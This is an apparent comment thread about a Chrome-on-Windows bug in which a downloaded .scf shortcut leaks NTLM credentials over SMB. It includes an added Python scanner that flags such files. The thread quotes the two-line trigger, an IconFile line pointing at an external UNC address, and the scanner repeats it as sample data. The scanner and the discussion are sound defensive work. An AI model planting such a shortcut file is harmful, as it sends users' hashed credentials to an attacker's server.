
If the .scf file contains this code:
> [Shell]
> IconFile=\\170.170.170.170\icon
Surely most corporate networks will block almost all external IPs though?
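The two-line snippet quoted above is the whole trigger: Explorer reads the `IconFile=` value and tries to fetch the icon over SMB from whatever host the UNC path names. The following Python scanner is an added example, not code from the article or from anyone in this thread. It parses the INI-style text of an .scf (or .url) file, pulls out every `IconFile` entry, and classifies the target as a local path, a private/loopback address, a public address, or an unresolved hostname, so a downloaded shortcut can be checked before the folder holding it is ever opened. The `170.170.170.170` address comes from the snippet above; the other sample bodies, the `10.0.0.5` address and `example.com` are constructed for the demo. It generalizes the page's example slightly by also accepting the `file://\\host\` spelling and the `,<index>` suffix Windows allows on icon paths.

```python
"""Flag .scf / .url shortcut text whose IconFile points at a remote UNC host.

Added example, not code from the article or any commenter.  Sample bodies below
are constructed; only the 170.170.170.170 address is taken from the posted snippet.
"""
import configparser
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# \\host\share\... or file://host/... (Windows also accepts file://\\host\...).
_UNC_RE = re.compile(r"^(?:file:[\\/]{2,}|\\\\)([^\\/]+)(?:[\\/].*)?$", re.IGNORECASE)
# Icon paths may carry a trailing ",<resource index>", e.g. "explorer.exe,3".
_ICON_INDEX_RE = re.compile(r",\s*-?\d+\s*$")

# Constructed sample bodies (CRLF line endings, as Windows writes them).
SAMPLE_EXTERNAL = "[Shell]\r\nCommand=2\r\nIconFile=\\\\170.170.170.170\\icon\r\n"
SAMPLE_BENIGN = ("[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
                 "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
SAMPLE_INTERNAL = "[Shell]\r\nIconFile=\\\\10.0.0.5\\icons\\corp.ico,0\r\n"
SAMPLE_FILE_URL = ("[InternetShortcut]\r\nURL=https://example.invalid/\r\n"
                   "IconFile=file://\\\\example.com/x.ico\r\n")


@dataclass
class IconTarget:
    section: str
    raw: str
    host: Optional[str]   # None when the icon path is not a UNC path
    verdict: str          # 'local-path', 'local', 'public' or 'hostname'


def classify_host(host: str) -> str:
    """Decide, offline, how worrying a UNC host is."""
    if host in ("?", "."):           # \\?\ and \\.\ are local device-path prefixes
        return "local"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"            # cannot resolve offline; treat as suspicious
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return "local"
    return "public"


def _parse_ini(text: str) -> configparser.ConfigParser:
    # No interpolation: values legitimately contain '%SystemRoot%' and friends.
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text.lstrip("\ufeff"))
    return cp


def scan_shortcut_text(text: str) -> List[IconTarget]:
    """Return every IconFile entry in the shortcut text with its classification."""
    try:
        cp = _parse_ini(text)
    except configparser.Error:
        return []                    # not INI-shaped at all: nothing Explorer would fetch
    found: List[IconTarget] = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if key != "iconfile":    # configparser lower-cases keys, matching Windows
                continue
            path = _ICON_INDEX_RE.sub("", value.strip())
            match = _UNC_RE.match(path)
            if not match:
                found.append(IconTarget(section, value, None, "local-path"))
                continue
            host = match.group(1)
            found.append(IconTarget(section, value, host, classify_host(host)))
    return found


def is_suspicious(text: str) -> bool:
    """True if rendering the folder would make SMB contact with a non-local host."""
    return any(t.verdict in ("public", "hostname") for t in scan_shortcut_text(text))


if __name__ == "__main__":
    for name, body in [("external", SAMPLE_EXTERNAL), ("benign", SAMPLE_BENIGN),
                       ("internal", SAMPLE_INTERNAL), ("file-url", SAMPLE_FILE_URL)]:
        print(name, is_suspicious(body), [(t.host, t.verdict) for t in scan_shortcut_text(body)])
```

The scan only says what the file would make Explorer try to reach; whether that attempt actually leaves the network is the outbound-445 filtering question the rest of this thread argues about. A hostname is reported as suspicious rather than resolved, because resolving it from the scanning host would itself be a network contact.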
Google's Chrome team is working to fix a credential theft bug that strikes if the browser is running on Microsoft Windows. The bug is exploited if a user is tricked into clicking a link that downloads a Windows .scf file (the ancient Shell Command File format, a shortcut to Show Desktop since Windows 98). This exploits two …
"To retrieve the icon, the user's machine will present credentials to a server – their user ID and hashed password on a corporate network, or the home group's credentials if it's a personal machine."
I believe this to be a non-issue. On my home network I have quite a few machines that I connect to, and whose shares are protected with a username/password combination. I also always click the "remember" checkbox to keep things easy on me.
So here's the thing: every time I reset my computer, Windows 7 will ask me for my credentials all over again. It literally doesn't remember squat whenever you reboot. Now in all fairness I must point out that I'm using Windows 7 with a non-administrative account. But wouldn't that also apply to those computers in a corporate / enterprise network?
So yeah, I can't help wonder if this issue is really as big as is being claimed.
Yes, with all the attention given to SMB lately most companies will block that traffic outbound. But there are many, many smaller companies who have those systems handled by someone else, even their ISP. Or they bought something and once they had connectivity they left it alone. They are at risk, as is the home user. No, the credentials will not have to be typed manually on business devices. That's all handled transparently. Given how fast Google automatically patches things, this probably is a non-issue.
Chrome in this case appears to be doing _exactly_ what it is told to do. That being to download a file and store it in the file system.
The actual issue, that a shortcut file can cause your machine to attempt to communicate with a third party just by opening the directory it is stored in, would seem to me to be more of a Windows issue.
Or am I wrong?
Wait... Windows cheerfully reveals its hashed login info to any IP in the two-line text file just by being in the directory a user viewed, and it's Chrome that has a bug because it faithfully downloads the file without screwing with the filename?
I don't see that as a bug. If it renames the file without permission, though, I would see THAT as a bug.
"Tricking" IE into connecting to file://\\example.com/ leaks NTLM credentials.
2016: https://www.perfect-privacy.com/blog/2016/08/01/security-issue-in-windows-leaks-login-data/
1997: http://insecure.org/sploits/winnt.automatic.authentication.html
MS claims that this is the correct behaviour and you should filter outgoing connections if you don't like it.